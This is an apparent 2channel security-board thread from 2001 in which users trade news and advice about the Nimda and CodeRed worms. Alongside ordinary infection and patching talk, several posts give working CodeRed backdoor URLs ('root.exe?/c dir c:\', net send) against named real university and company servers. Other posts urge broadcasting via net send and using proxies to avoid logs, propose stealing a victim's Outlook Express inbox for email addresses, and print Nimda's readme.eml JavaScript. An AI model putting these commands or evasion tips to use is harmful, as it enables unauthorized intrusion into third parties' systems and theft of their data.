C:\Documents and Settings\ユーザー名\Local Settings\ApplicationData
\Identities\{****-****-****-****-************}\Microsoft\Outlook Express\受信トレイ.dbx
をDLしてメールアドレスを探る。

どこかのスレにプロバイダー別のIP割り当て表の
ページへのリンク貼ってあったと思うんだけど
わかる人いますか？

>>380
流石にそれは捕まるだろ(藁

>>382
何で？

>>380
結局、解る奴にとっては色々遊び場増えるのね（ｗ
てーか、初期の頃オリエントのサイト感染してたのには笑ったけど。
俺、オリコカード作ってないから良いけど。
公開サーバには流石に置かないか。

http://アドレス/root.exe?/c%20net%20send%20localhost%20%22このサーバにはCodeRedの開けたバックドアが仕組まれています。今すぐroot.exeの削除をオススメします。　　by ２ちゃんねら〜%22
これで馬鹿な管理者も気付くだろう？

>>384

もしかしてにむだ＋バックドアサイトで表紙だけ無くなってるのって、親切な人が分かるように削除してあげたとか？(^^;

>>383
個人情報ぱくっちゃマズイって・・・

>>387
この場合、晒してるほうが悪いんじゃないか？
380がバックドア仕掛けたんなら別だけど。

URLを打ち込むだけで捕まるかは微妙だと思うな。
でも事実上サーバを完全にコントロール出来るからな・・・

>>385
net%20send%20localhost
　↓
net%20send%20*
　↓
(ﾟдﾟ)ｳﾏｰ?

>>390
君過激♪

>>385

やったおいらのIPは感染サーバーのログに残るよなぁ？

>>392
串使ったら？

>>393

了解(^^;

うひい（＠＠〜☆

http://www1.fl.kansai-u.ac.jp/scripts/root.exe?/c%20dir%20c:\

取引先のタコケチ社長に電話でSP2へのアップの手ほどきしました。
「SP2をインストールするために、念のために一旦ウィルス対策ソフトを止めます。」
と言うのに対して
「ウィルス対策ソフトを止めたら、その間にウィルスに感染するかもしれへんやん。
　そんなことになったら、あんたが責任を取ってくれるんか」
仕方が無いから、セットしに行きますということで行ったら、タコのパソコンに入っているのが
ウィルスバスター９７。「？」という顔をしていると、「ああ、それ。知り合いにもろてん（もらったんだよ）」
　「これじゃ意味無いですよ。新しいのを買ってください」と言うと、「ええ〜？買うん？
あんた、そういうのの新しいの持ってないん？持ってきて入れてくれんか？」

以降はほとんど無視して、ニムダウィルスチェックして(奇跡的にも？かかって
いなかった。っていうかIE4だったし）IE5.5SP2入れて、「問題なし」と言って
帰ってきてしまったんだけど・・（VBはパチもん97のまんま）

おんなじような個人ユーザーって結構居るんだろうな・・・

>396
>タコのパソコンに入っているのが
ウィルスバスター９７
（ｗ

>>397

>>タコのパソコンに入っているのが
>>ウィルスバスター９７
>（ｗ
本当なんですよ。なんかよそで使わなくなったのをもらってきて
入れたんだとか。部下に聞いたら、
くれた人からも「こんなん入れても意味無いよ」とか言われてたらしいんだけど(笑)

>>396
＞ウィルスバスター97

最新版持ってても、アップデートの仕方を知らないやつも沢山居るよ(笑)

いや、ニムダ以外のウイルス感染の方が遥かに気になり（ｗ

>>396

> ニムダウィルスチェックして(奇跡的にも？かかって
> いなかった。っていうかIE4だったし）

バックドアは大丈夫ですか？

ここの過去ログに、ニムダウィルスチェック・駆除だけしてバックドア健在というようなサイトが報告されているので・・。

>>396
タコ社長（失礼）からアイラブユーメールは来なかったかい？(ワラ

>>401
クライアントにバックドアは無いだろ？

かぶった・・鬱死

>>396
タコ社長は97年にパソコン初めて触って楽しかったんだろうねー。

>>404
not Foundおめ。

聞いてください。

私のIEはだいぶ前からSP2にしてあったので大丈夫だと思っていました。
しかし今日新しくNorton AntiVirus2001入れてスキャンしたらいきなり
C:\WINDOWS\Temporary Internet Files\Content.IE5\に
readme.eml が見つかったのでひとまずノートンで消しました。

あわてて↓ここで見たとおり駆除ツールをやってみたのですが、
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a%40mm.removal.tool.html
このツールでは駆除できないと言われます。
しかもこのとき作られるログを見てください。

-----------------------------------------------------------------------
The file "d:\program files\katjusha2102\log\ton.2ch.net\sec\1000870301.dat"
　　　is dropped by W32.Nimda.A@mm. The tool could not delete this file.

The file "d:\program files\katjusha2102\log\news.2ch.net\news\1000861682.dat"
　　　is dropped by W32.Nimda.A@mm. The tool could not delete this file.

The W32.Nimda.A@mm removal was unsuccessful.
Here is the report:
The total number of the scanned files: 45207
The number of deleted files: 0
The number of repaired files: 0
The number of viral processes terminated: 0
The tool could not delete 2 W32.Nimda.A@mm files from your PC,
Please contact Technical Support for assistance.
-----------------------------------------------------------------------
かちゅ〜しゃをd:\program files\に入れて使っていますが
かちゅ〜しゃのログにNimdaがいるといってます。
そんなことありえるのでしょうか？

>>396
いや、くれた奴が実はソシャルのスキル持ってて、敢えて旧いバージョン
呉れたんだよ。社長が平気で入れるのを見越して。。。
今ごろそいつ、Sub7のサーバー.exeカスタマイズしてるところだよキト（ｗ

>>407
レスに書かれているHTMLのコード>>336などを検出してるんじゃないでしょうか。
で、そのツールの但し書きによれば

＞感染している.eml、.nws、.doc、.txtファイルは削除します。
＞上記4つの拡張子以外の拡張子を持っている.emlファイルは、このツールでは削除されません。

ということで消せなかった、とレポートされたのだと思います。

>>407
ノートンって、本体のreadme.emlと感染html関係の上書きスクリプト部分
同じ名前で検出するのかな。そうだとしたらチョとややこしい。
バスターだと接頭がPEとJSで区別されてるからすぐわかるけど。
・・・あんま関係無いレスサゲ。

ふと思ったけど
wavの表示を高速にするためにリンク先先読みするソフトで、リンク先の鯖が感染してて
開いてもいないのにこちらも感染なんてありえますか？
（ソフトにもよるでしょうけど）

>>411
Wav? Web??

>>411
ストリームする時のバッファリングの事かな。。。。
・・と敢えて訳解らん方向に持っていって見る（ｗ

>407です。
いちおログを消したら
The W32.Nimda.A@mm has not been found on your computer.
がでてきて安心しました。

この駆除ツールも適当っすねぇ。

>410
あっ、ノートンでは２ｃｈのログ検出されないっすよ。
駆除ツールでスキャンかけると引っかかります。

http://www.geocities.co.jp/SiliconValley/5312/

こんなの見つけた(笑)

>>415
ってー事は、、、、みだりにソース貼ると不味いのか。。
特定環境のユーザーに取っては。。今ごろ気づいた。
サンクス。

>>416
まあ、ありかもね。

>>333
>>334
これは実のところどうなの？

>>416
作者の言うとおりデザインはいまいちだね。
でもいいんじゃないか。

「無リン洗剤にはムリンが入ってるんでっしゃろか？」
なんて言う爺ちゃんには
「うん、ムリンが入ってるんだよ」と答えてやった方がいい。
そんな感じのページだね>>416

>>385

何人かがやってくれたみたいだけど、とりあえず閉めたのかな？

http://www.takara-univ.ac.jp/
http://www.takara-univ.ac.jp/scripts/root.exe?/c%20dir%20c:\

既出だとおもうが

ねすけ６．１で煮無駄サイトにアクセスすると・・
ダウンロード警告がでます
ダウンロードするとｅｍｌファイルがダウンロードされます。
ＩＥ５．ＸがＳｐ２になっていないと・・ダウンロードしたファイルをエクスプローラ等でクリックすると感染します

情報が無い。

１．Admin.dllに感染したサイトも、メールをばりばり送るんでしょうか？
２．IEで感染したパソコンも、他のIISサーバーを攻撃に行くんでしょうか？

ウィルスバスター97でも、
海外のトレンドマイクロのサイトからパターンファイルをダウンロードして
ファイルにコピーペーストしたら、使いつづけられませんか？

今だに同じIP（感染したサーバー）からポートを叩かれてる。
ポートを変えたは良いが・・・・

>>426

どこ？バックドアがあるなら串経由でシャットダウンしてやるよ！ σ(^-^；；

http://61.113.33.218/
http://61.113.0.130/
http://61.113.33.218/
http://www.ucar-tky.or.jp/mokuji.htm

連休で放置されてる鯖多いんだろうね。。。

ていうかホスティングの価格さがってるんだし
会社案内ぐらいしか載せてない企業が自前サーバ自営ドメインで
Webサイト開く意義って何かあるの。
危険おかしてまで。。

>>430
サンマイクロシステムズやらIBMやらの陰謀です(爆)
eコマースってなに？

>>430
メールサーバとしてつかうつもりでアブライアンスサーバかったら
Ｗｅｂサーバ機能もまけでついてかからとか・・

じゃあ今回の騒動に責任はMSだけではなく
サンマイクロシステムズやらIBMやらにもあるな。

>>429

明日の朝、日本のニムダ報告件数が一気にふえるぞ。

http://wtc.trendmicro.com/wtc/

http://members.tripod.co.jp/bingo852/

>>435
view-source:http://members.tripod.co.jp/bingo852/
何？これ。

（連休って日本だけ？）

>>435
そのエロサイト飽きたよ。何度もコピペするなんて厨房丸出しだな

韓国とかも多いけどnet sendは英語でいいんだろうか？
ハングルは分からんし（ｗ

　　　　。o 0 〇　○　　○
　　 □□
　　 □□　 　 ■■■■■■
　　 □□■■■■■■■■■■
　　 □■■■■■■■■■■■■■
　■■■■■■■■■■■■■■■■■
　 　■■■■■■■■■■■■■■■
　 　■■　 　 　 　 　 Zzz...　 　 　 　 ■■
　 　■■　 　 　 ∧∧　 　 　 　 　 　 ■■
　 　■■　 Zzz. (- - )⌒⌒⊇?　 　　■■
　 　■■　 　 ~~~~~~~~~~~~~~~~　 　 ■■
　　 ■■■■■■■■■■■■■■■
　 　■■■■■■■■■■■■■■■

フジＴＶでホームページ書き換えネタやってる。
・・・・・・・

こいつがやってそうだな。

http://www.access-us-inc.com/
ここも閉鎖中

ウチの会社、偉い人が
「ＨＰを見るだけで感染することなど有り得ない」
と断言しちゃったんで、事実上対策禁止状態・・・。

>>444
そいつのPCに感染させてやるのだ。報告きぼーん。

厨房な問だから無視ですか？　私も>>424と同じ事聞きたいです
IE経由で感染したwin９X系のPCもIIS攻撃するんでしょうか？

>>445
誰か感染したら全社道連れですがな・・・。

>>446
しない。Ｗ２ＫでＩＩＳ入ってればするけど。

つうか、なんでＩＩＳ攻撃だけ気にする？

最低限の予防策
１）ＩＥ５．１ーＳＰ２，ＩＥ５．５ーＳＰ２，ＩＥ６＋ＯＥ６
のいずれかのバージョンにしておく。
２）ＩＥのセキュリティーレベルを中以上にする。
３）readme.exeの警告が出たらキャンセルする。

やっておいた方がいい対策
１）メディアプレイヤーをインストールしておく。
２）Javaのアクティブスクリプトを切る

で合ってる？

即レスありがと　IIS攻撃というよりも
攻撃元がwin9XやmeのPCからの直接攻撃も含まれるの
だったらこのアタックの多さも説明できるかと

まがりなりにもIISでサーバたててるのに対策してない人がこんなに
多いなんて自分には信じられません

From : [email protected]
Subject : Re: Make Unlimited Phone Calls for $69.95/month! CODE:7777
Date : Mon, 24 Sep 2001 12:58:00 -0400
Received: from [203.228.117.254] by hotmail.com (3.2) with ESMTP id MHotMail***
From [email protected] Mon, 24 Sep 2001 09:57:49 -0700
X-Sender: [email protected]
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
X-Priority: 3
X-MSMail-Priority: Normal
[email protected]

From : [email protected]
Subject : FREE Pizza Hut pizza for a year !!
Date : Fri, 21 Sep 2001 17:54:25 -0600
MIME-Version: 1.0
Received: from [139.142.205.227] by hotmail.com (3.2) with ESMTP id MHotMail***
Received: from playsic-en4q0ov (localhost) by mail2.playsic.com (LSMTP for Windows NT v1.1b) with SMTP id <[email protected]>; Fri, 21 Sep 2001 18:01:56 -0600
From owner-nolist-testbounce Sat, 22 Sep 2001 00:38:14 -0700

From : PUNTOG.NET < [email protected] >
Subject : World Trade Center + 400 fotos, videos, etc. --> Noticias PUNTOG.NET - 22.09.2001 - SOMOS de 15.000.-
Date : Mon, 24 Sep 2001 21:10:00 +0200
MIME-Version: 1.0
Received: from [195.53.204.158] by hotmail.com (3.2) with ESMTP id MHotMail***
Received: from localhost ([217.126.109.143]) by infonegocio.com with Microsoft SMTPSVC(5.5.1877.507.50); Mon, 24 Sep 2001 00:17:32 +0200
From [email protected] Sun, 23 Sep 2001 15:21:55 -0700
X-Sender: [email protected]
Organization: www.puntog.net
Return-Path: [email protected]
Message-ID: < [email protected] >

>>449
>２）Javaのアクティブスクリプトを切る
頼むからこういう訳の解からん事は書かんでクレ…

>>452
ちがってた？javaスクリプト関係無し？

>>452
JAVAアプレットと区別するため
アクティブスクリプトと表示されているが？

>>453-454
Java"の"アクティブスクリプトなんてのは無い。
Javaアプレットのスクリプト/アクティブスクリプト(Javaスクリプト含)なら有るが。

ついでに今回のにはJavaは関係無い。

なるほど。
Ｊａｖａスクリプトのopenwindow（）を実行されないようには
できないんでしょうか？

「Javaスクリプト」じゃなくて「JavaScript」だ。

>>444
>ウチの会社、偉い人が
> 「ＨＰを見るだけで感染することなど有り得ない」
> と断言しちゃったんで、事実上対策禁止状態・・・。


会社サイトで堂々とニムダ垂れ流してるのはこういうところか・・。

たしかにニムダ、しなやかにニムダ、先進のネットワーク企業
http://www.d-link.co.jp/
ニムダダウンロードサービス実施中

弊社は「ＨＰを見るだけで感染することなど有り得ない」と信じて三連休も思いっきり休んじゃいました。

>>446
>IE経由で感染したwin９X系のPCもIIS攻撃するんでしょうか？

>>448
>しない。Ｗ２ＫでＩＩＳ入ってればするけど。

すまん。これの情報源がどこにあるのか教えて。
下のページじゃ Nimda が IIS のバックドア探すために
get request を送るタイミングについては触れられてないんだけど・・・
http://a500.g.akamai.net/7/1776/484/00002/inet.trendmicro.co.jp/solutionfile/3059NIMDAINF.htm

>>451

http://139.142.205.227/scripts/root.exe?/c%20dir%20c:\

こういうのって対策済み？？

>>449
前スレ900の対策はどうよ?
http://ton.2ch.net/test/read.cgi/sec/1000973617/900

Nimda感染サイトのwww.d-link.co.jpの上位回線はxdsl.ne.jpだから東京めたりっく通信だな。

東京めたりっく通信
http://www.metallic.co.jp/
新種ワーム「Nimda」感染に関するご注意
http://www.metallic.co.jp/topics/2001/0919.html

>>463

>Nimda感染サイトのwww.d-link.co.jpの上位回線はxdsl.ne.jpだから東京めたりっく通信だな。


あ��(￣△￣；

トップページのhtmlファイルだけ削除だよ。
バックドアよりすごくない？(^^;

www.d-link.co.jp

>>464　IIS可動させたまま駆除ソフト動かして、駆除ソフトにhtmlを含む感染ファイルを全部削除されちゃったのかな？

http://www.takara-univ.ac.jp/scripts/root.exe?/c%20dir%20c:\
まだ相変わらず見えてるよ...
厨房の俺でもハッカーになれてしまう
W2k鯖は糞だね...

>>466

チェック速いですね(^^;

相変わらずというより、ここ、昨夜夜半閉じていました。
昨夜とファイル構成が変わっているので一応駆除かなにかしたみたいです。

おそらくニムダ対策はしたみたいなんだけど、バックドアはそのままのようで・・。

あと、ここはw2kじゃないみたいです。
http://www.takara-univ.ac.jp/scripts/root.exe?/c%20ver

CodeRed系のアタックも激減！
Nimda様ありがとう！

>>466
ucspi-tcp-0.88.tar.gz
・・・何で、tarボール有るの？
ってーか、デュアルにしてlinuxに移行するつもりかな、取り合えず（ｗ
コレでフィルタかけれるのかな。。。NT

mentai鯖感染されてない？
mentai　みてたらreadダウンロードダイアログが出たんだけど。
関係ない？ちなみに情報シス板見てた時。
勘違いだったらすまん

>>407
あせるよね。
俺もホットゾヌのログで引っかかったので。

>>471
mentai見てた時？

>>470

とりあえず平気だけど・・。

http://mentai.2ch.net/test/read.cgi?bbs=infosys&key=1001349144&ls=100

あなた自身が感染していて、キャッシュにニムダJavaScriptがカキコされてるとか・・。

もしかして2ch専用ブラウザのどれかとか使ってませんか？

>>469

この様子ではニムダごとlinuxに展開されることになると思われ。

>もしかして2ch専用ブラウザのどれかとか使ってませんか？

いや、普通のIE5.5　SP２
騒がれてしばらくしてからSP当てた。

ちなみにSP当ててからIMEが遅くなり　.htm(tar圧縮)も見れなくなった。
気にしてなかったけど、もしかして漏れ感染されてるのかな？ｗ　笑いどころじゃないか････・

感染してるか否かを調べるにはどうすれば？

>>476
とりあえずこれか？

トレンドマイクロ ・ ウイルス バスター オン ライン スキャン
http://www.trendmicro.co.jp/hcall/scan.htm

>>434
>>>429
>
> 明日の朝、日本のニムダ報告件数が一気にふえるぞ。
>
> http://wtc.trendmicro.com/wtc/

増えてるよ(´Д`)

>>477
ありがと。ただ今チェック中。
いや、感染してた･･････････
とりあえず本当にありがとう。

read.exeダウンロードしてないのに･････

ちなみにこれ
http://inet.trendmicro.co.jp/virusinfo/isp/default3.asp?VName=JS_NIMDA.A

あれ・・

>>480
それだけなら、感染してないんじゃない？

>>481
女子短大の学生さんがにちゃんなんかみてちゃダメだよ(w

>>482
どうやら感染はしてないみたい。
プルトニウムの解説ページのキャッシュがウイルスチェックに引っかかったみたい。
いった記憶無いなあ・・・・・・２chでリンク張られてたのだろうか？

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

でも、なんでmentaiからread.exeダウンロードダイアログが出たんだろ？
とりあえずお騒がせいたしました。ありがとうございました。

>>481
セキュ板に春の予感・・・

>>483
業者の人間が、学校へ行って接続しただけじゃ！（ｗ

>>478
http://wtc.trendmicro.com/wtc/
すげぇ〜韓国、中国、ロシアでは一件の報告例もないぞ！（ｗ

>>486

> >>478
> http://wtc.trendmicro.com/wtc/
> すげぇ〜韓国、中国、ロシアでは一件の報告例もないぞ！（ｗ

ワレ大国では、バスター持っててもキーが送られてこないから、ニムダのひっかかるバージョンがまだないのよ（ｗ

>>486
ぢつは、、、、韓国、中国、ロシア共同で今回のnimdaコンセプトウイルス開発
してたのさ。
だから、事前情報持っててパッチは適用済み。
俺の脳みそカーニボーがキャッチした情報だ。

>もしかして2ch専用ブラウザのどれかとか使ってませんか？

2ch専用ブラウザってIEの部品使ってるんですよね。
IE5.5 SP2だったら大丈夫ですよね？
私かちゅ使用なんですけど・・・

http://wtc.trendmicro.com/wtc/
グラフのニムダ収束の仕方が気になる。
いくら何でも発生以前の状態にこんなに早くなる物か？

SouthKorea---0
うそーん

>>490
Daily Summary Report のグラフのことを言っているのだろうが、最終日
の値は、０に固定されているから収束しているように見えるが、実際の値
は９／２３日の値を最後としてグラフをみるべし。

一応、数量的には収束に向かっていると評価してもよいだろうが、発生前
の水準に戻ったなんてことはないね。

>>489

ええっと、ログの保存形式の関係で、キャッシュなどがあるスキャンソフトではひっかかり、あるものでは引っかからないと、ここの過去ログで読んだ気がしたので書いてみましたm(_ _)m

>>492
＞最終日の値は、０に固定されているから収束しているように見えるが
そうだったんだ。変だとオモッタヨ。

リンク間違ってた。グラフはこっち。
http://wtc.trendmicro.com/wtc/report.html

>>488

>ぢつは、、、、韓国、中国、ロシア共同で今回のnimdaコンセプトウイルス開発
してたのさ。
>だから、事前情報持っててパッチは適用済み。


そんなこたぁない（ｗ

「中国一号」，100万人に感染か──人民日報
http://www.zdnet.co.jp/news/bursts/0109/21/people.html

全然収束してないよ。
CodeRedの方がひどいね。
Nimdaを駆除したからって安心してる人も多い。

ここきのうまでニムダサイトだったんだけど、対応ひどくない？

http://www.d-link.co.jp/

>>497
ここはおとといまでニムダサイトだったんだけど、しらんぷり。ひどくない？

http://www.with9.com/

>>496
ひどいねぇ・・・・。
http://210.12.157.160/scripts/root.exe?/c%20dir%20c:\

新種のコンピューターウイルス「Ｗ３２．Ｖｏｔｅ．Ａ＠ｍｍ」が登場し、ウイルス対

>>493
レスありがとうございます。
だけど意味がわからない私って・・・（ﾆｶﾞﾜﾗ

いろんなスレを読んでみて、大丈夫だとは思っていたんですが
>>473さんの

>あなた自身が感染していて、キャッシュにニムダJavaScriptがカキコされてるとか・・。
>もしかして2ch専用ブラウザのどれかとか使ってませんか？

発言を読んで専用ブラウザは感染の恐れがあるってこと？
と思ったもので。ここ、ｾｷｭ板だし・・・。

>>500
>新種のコンピューターウイルス「Ｗ３２．Ｖｏｔｅ．Ａ＠ｍｍ」が登場し、ウイルス対


これが何か？
ウイルス名： TROJ_VOTE.A
http://www.trendmicro.co.jp/virusinfo/default3.asp?VName=TROJ%5FVOTE%2EA

ニムダ対応パターンで検知可能だそうな。

ちがってたらフォローくれ。

連休明けても、放置されたままサイト結構あるな。。
たち上げ時に業者に設定させて
あとは日常は管理してないのかな

>>502

って、今日になってのーとん先生、アップデート出してるやん（＠＠〜☆

>>504

ういるすばすたーもでてるやん（＠＠〜☆

摩訶ふぃーはどうよ？

表紙が無くなっていると思ったのに、またこんな・・。
http://www.maruko-j.co.jp/scripts/root.exe?/c%20dir%20c:\

WinNT3.51serverで対応できた人いますか？
共有かけてあったホルダにdesktop.emlが出来てたけどそれ以外は
被害は無い様なんですけど。

トホホ…

http://www.maruko-j.co.jp/WebBBS/info.html

(注: readme.emlはありません)

誰だmaruko-j.co.jpのサイトのファイル全部消したの(w

>>505
まかちゃんも対応済み
http://www.nai.com/japan/virusinfo/virV.asp?v=W32/Vote@MM

ちんぴょろすぽーん！
http://members.tripod.co.jp/bingo852/

読売新聞に「ニムダ感染拡大」の記事が
http://www.yomiuri.co.jp/bitbybit/bbb07/192501.htm

あげ

>>509

まあ、ここは旧に復してもどうせすぐroot.exeが挿入されるだろう(w

>>512
ソコの記事読んで思った。今回慌ててSP当てた人が大半だと思うけど、個別のパッチ当ててく
方が更に重要だと思う。今後的に。
そりゃ、SP自体週1で更新されてれば良いけど（ｗ

｜ 日本ネットワークセキュリティ協会理事でもある日本ヒューレット・パッカードの
｜ 佐藤慶浩シニアセキュリティコンサルタントは、「例えば一般ユーザー向けに
｜ ボタン１つで簡単、迅速にソフトを最新版に更新できる機能をＩＥにつけるべきだ」
｜ と指摘する。ユーザー自身がパソコンを守るという意識を高める必要があるが、
｜ マイクロソフトにも、確実に伝わる分かりやすい情報提供が求められよう。

うーん、これってWindowsUpdateではないのだろうか…
日本ネットワークセキュリティ協会理事はWindowsUpdateを知らないのだろうか、
それともWindowsUpdateではまずいなら、それ欠点もちゃんと説明すべきではないだろうか…

WindowsUpdateは怖い、SPを当てると動かなくなることがあるからいやだ、
HotFixは面倒…

あーもうこういう自分勝手な輩にはいいかげんうんざりだよ。

>>512
>読売新聞に「ニムダ感染拡大」の記事が
> http://www.yomiuri.co.jp/bitbybit/bbb07/192501.htm

◆セキュリティーに無関心な利用者


どちらかというと今回の場合、利用者というより管理者のような・・。

>>516
たぶん、キーボードに「WindowsUpdateキー」をつけたらイイ！
とか思ってるんでない？
F1キーに「ヘルプ」とか、キーの機能を表すテプラを貼ってる人もいるくらいだしね。

>>516
>ユーザー自身がパソコンを守るという意識を高める必要があるが、
・・・ボタン一つでやらせて、コレ身につくの？（ｗ
穴放置させとくよりは良いか。
あんまり、揚げ足鳥は良くないけど。。言いたくも成るよね。>516

ついに弊社では、「ウィルス被害を防止するため、インターネット・エクスプローラおよび Outlookの使用を平成14年3月末まで禁止する。」という通達が出ました。（＞＜）

>>512
肝心なバックドアからの感染には全く触れてないね…

>>520
・・・・ネタでなく？？
ご愁傷様・・・

WEB閲覧が全面的にストップされて、困っていました。

>>518

きっとそのキーからすり減るね(^^;

どこかで見た　Ctrl+Alt+Del　だけのキーボード（ｗ　に通ずるものがある(^^;

これからはF5キー連打ではなくWindowsUpdateキー連打でＭＳにDDos攻撃だ！(w

>523
現状調査と対策済むまでは、仕方ないね。

なんて豪快な・・。

http://www.d-link.co.jp/

>>520
ついでにWindowsもやめてMacかLinuxにでもするとよいねぇ。
もちろんWordやExcelのマクロも危険ですから一太郎とLotus1-2-3に決まりだね。

ったく、IEやOutlookを禁止する通達が出せるなら、なぜIEのSP2をあて、Outlook
にもSR2をあてる通達が出せないんだか。

きっと脳みそのbit数が足りないんだろうね。

>>520
いろんな対応があるものだ。
こうなるとパソコンの使用禁止ってのもどっかにあるんだろうな。

>>526

ソースみて二度びっくり（＠＠〜☆

>>526
やけっぱちでワードでＨＴＭＬ作ったな。

>>528

伝聞だが某大学の学生向けパソコンスペースは当面閉鎖になったらしい。就職活動はどうするんだ？

PC-9801をDOSで使ってる人は引っかからなくてラッキーだったかも。
未だに一太郎4使ってるとこもあるし…

>>530

しかし、ここは近日中に再感染するとみた・・・＜先週以来の対応が泥縄

ここの告知が変わったぞ。

http://www.with9.com


これの影響か？

http://www.dolphinnetservice.ne.jp/component/bbs/bbs.asp

>>533
今月でCoderedIIは永眠するからその後フォーマットすればバックドアは塞がる。
「おおっ直ったじゃん」ってこんな対応でもいいのかな。
このサイト管理者。

>>527

その通達出したらITが対応でてんてこまいになるからだろ
パッチ出る度に「やり方がわかりません」なんて言われてITがいちいち対応しなくちゃならん。
それなら、いっそうのこと使用禁止にした方がまだまし。

だいたいIE、OEでなくちゃならん理由はないだろ。

>>528

そりゃないだろ

IEやOEの代わりはいくらでもあるがPCの代わりはない

From : [email protected]
Subject : Re: Make Unlimited Phone Calls for $69.95/month! CODE:7777
Date : Mon, 24 Sep 2001 12:58:00 -0400 Received: from [203.228.117.254] by hotmail.com (3.2) with ESMTP id MHotMail***
From [email protected] Mon, 24 Sep 2001 09:57:49 -0700
X-Sender: [email protected]
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
X-Priority: 3
X-MSMail-Priority: Normal
[email protected]

From : [email protected]
Subject : FREE Pizza Hut pizza for a year !!
Date : Fri, 21 Sep 2001 17:54:25 -0600
MIME-Version: 1.0
Received: from [139.142.205.227] by hotmail.com (3.2) with ESMTP id MHotMail***
Received: from playsic-en4q0ov (localhost) by mail2.playsic.com (LSMTP for Windows NT v1.1b) with SMTP id <[email protected]>; Fri, 21 Sep 2001 18:01:56 -0600
From owner-nolist-testbounce Sat, 22 Sep 2001 00:38:14 -0700

From : PUNTOG.NET < [email protected] >
Subject : World Trade Center + 400 fotos, videos, etc. --> Noticias PUNTOG.NET - 22.09.2001 - SOMOS de 15.000.-
Date : Mon, 24 Sep 2001 21:10:00 +0200
MIME-Version: 1.0
Received: from [195.53.204.158] by hotmail.com (3.2) with ESMTP id MHotMail***
Received: from localhost ([217.126.109.143]) by infonegocio.com with Microsoft SMTPSVC(5.5.1877.507.50); Mon, 24 Sep 2001 00:17:32 +0200
From [email protected] Sun, 23 Sep 2001 15:21:55 -0700
X-Sender: [email protected]
Organization: www.puntog.net
Return-Path: [email protected]
Message-ID: < [email protected] >

IE、OE使ってるヤツはウイルスをばらまいてることに責任を感じないんだろうか

>>535
フォーマットしたら当然パッチも消えてる事に管理者気づく事を祈ろう（ｗ

>>502
スレ違いだが「アメリカとイスラムの戦争について調査してます。
投票してくださいね」みたいなメールと一緒にやってくるそうな。
それで「vote」らしい。

夕刊に載ってた。

>>539
モ、モ、漏れがいつばら撒いたって言うんだ！！！！
今俺はナー！真赤なかをしてぷるぷしながらきーぼど叩いてるんだぞ！！！！

>>540

ありえんな。ニムダのまえにバックドア飼ってたんだから。

またおなじこと繰り返しておしまい。

>>539

感じたら元から使わないし、ＰＣ買う前にマカになっちまうよ（ｗ

>>541

まあ、このテは日本でははやらんな。

>>541
>>>502

> それで「vote」らしい。
>
> 夕刊に載ってた。

これかな。
http://www.asahi.com/international/update/0925/014.html
米で「投票ウイルス」発見　軍事行動の是非問う形で侵入

ここだけやけに重いんだが。
話題性があるからだろうけど、ちょっと扱いが大げさな気もする。

>>539 Win使うにゃぁそのくらいの鈍さがないとやってられん。そのていどで自分責めてたら発狂しちまう。

なんだここ？

宝塚造形芸術大学 短期大学部 見えたり閉めたり晒したり
http://www.takara-univ.ac.jp/

ここ４日くらい、昼間は感染サイト、夜は不通。

まさかWebサーバを朝起動して夜落してるのか？（ｗ

元感染サイト

株式会社シーエスディー
http://www.powerstage.com/default1.asp

ニムダ配布してニダの国行きプレゼントかい(^^;

ニダウイルス
　　　　　∧∧
　　　　<｀∀´>
　　　　　≡
　　／＼≡／＼
　　　　　│

その画像ならココ
http://www.f2.dion.ne.jp/~impact14/

>>550
ひまだねえ、あんた。

再感染

日本スベック株式会社
http://61.113.0.130

東京中販事務局宛
http://www.ucar-tky.or.jp/mokuji.htm

恥ずかしくないのかなぁ

Apache使ってるものですが、ログに攻撃？の後が残されてるけど、
404とか400だから大丈夫って言う気はしてるんですが、
Sambaも使ってるんですね。それで、Sambaの共有フォルダに
ニムダ各種.emlが・・・。でも、LanにつながってるWindows
パソコン全てを検索・ウイルススキャンしたけど、感染してない
もよう。Sambaのニムダも全部消したけど、時間が経ったら
また現れた。これってやっぱしつながってるWindowsが感染してる
からですか？

>552
ありがとう。
探してたんだ。

感染

近畿文化体系策定協議会内 実行委員会　　
http://www.bee.woodland.co.jp/test/kb-index.htm

再感染かも

>>554
オレも同じだよ。
だからApacehのポート番号換えた。
んで、LANを繋ぎなおしてローカルIPも変えた。
ドライブが共有にされるから「TROJ」系のファイルもある筈だよ。

>>554
まさか、NetBIOS系のポートが外から丸見え…ってことはないよね?

>>557
レスどうもです。つまりWinじゃなくてApacheが
直接やられていると・・・？Apacheだから安心
なんて思っていてはいけないのかなぁ・・・・。

>>554
ログを見ればApacheには外部から感染しないのはわかりそうな物だが・・・
Apacheにreadme.emlと改変されたhtmlファイルがあるのは共有でウプされた物。

>>558
それはIPマスカレードなどに関わることでしょうか？
丸見えかどうかはどうやって判断すれば…。

>>560
外部からは感染しそうもないのは大体わかります。
emlファイルがあったのは、ApacheではなくSambaで
共有していたディレクトリでした。

サーバ立ててるくせに厨房っぷりを発揮してすい
ません…。まだやり始めたばかりでこれからという
ときにこんなことになってしまったので。

>>556
本当だ！！
バスター君、働いてくれた。

俺が見に行った時のアクセスカウンター　010325だけど・・・。

どれくらいまで増えるのかな？

勢いで書いてしまったが、あんまり可能性なさそうだなあ。ｽﾏｿ
CATVとかだったら有り得る…のかな?
ipchains なり iptables で、ポート番号137-139と445(TCP/UDP)あたりが
ブロックされていればOKでしょう。

>>556
それテスト用のページみたい。
本編はこちら本編も感染。
ttp://www.bee.woodland.co.jp/
感染してるのに軽い。

>>563=588
それは大丈夫です！

>>554
こんな事聞くのもヤボだけど

どうやって感染の有無をチェックした？
W2kはFW通しているから安全とは思っていない?
W2kでこっそりIISが走っていない?　インストールしたつもり無くても走ってる事あるよ。
Codered�Uに感染した事ない？
このスレでリンクされてる感染サイト行ってない？

JR東海がNimdaの攻撃を撃退したとか記事が産経にでてたが
わざわざ記事にするような話だろうか。

>>554
Sambaの方も対策打つべし

「Samba における Nimda ワーム対策」
http://www.samba.gr.jp/project/kb/J0/1/09.html

やっぱ、自身を暗号化して潜り込んでウイルススキャンに引っかからない
ようなの作らないと駄目だな。

>>566
Windowsは98とMeです。状況詳しく書いてなくてすいません。
>>568
ありがとうございます！早速見てみます。

撃退つうのは自分のハードディスクからウィルスを除去するんでなくて
